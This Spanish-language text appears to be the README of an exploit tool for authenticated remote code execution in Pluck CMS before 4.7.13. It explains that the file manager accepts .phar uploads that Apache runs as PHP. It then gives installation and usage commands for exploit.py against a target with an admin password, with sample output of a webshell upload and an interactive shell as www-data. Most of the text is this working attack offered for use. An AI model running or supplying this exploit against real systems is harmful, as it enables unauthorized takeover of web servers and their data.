
Ejecución remota de código autenticada en Pluck CMS anteriores a 4.7.13.
Ejecución remota de código autenticada en Pluck CMS anterior a 4.7.13. El administrador de archivos (
admin.php?action=files) no valida las extensiones de archivo, permitiendo la subida de archivos.pharque Apache ejecuta como PHP. Subir una webshell a través de este endpoint resulta en RCE como el usuario del servidor web.
shell.phar a través del administrador de archivos.id.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
# Pluck en la raíz
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD
# Pluck en un subdirectorio
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
Ejemplo:
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Iniciando sesión...
[+] Sesión iniciada
[*] Subiendo webshell...
[+] Webshell subida
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] ¡El objetivo es vulnerable! Salida: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell abierta. Escribe 'exit' o Ctrl+C para salir.
Shell> whoami
www-data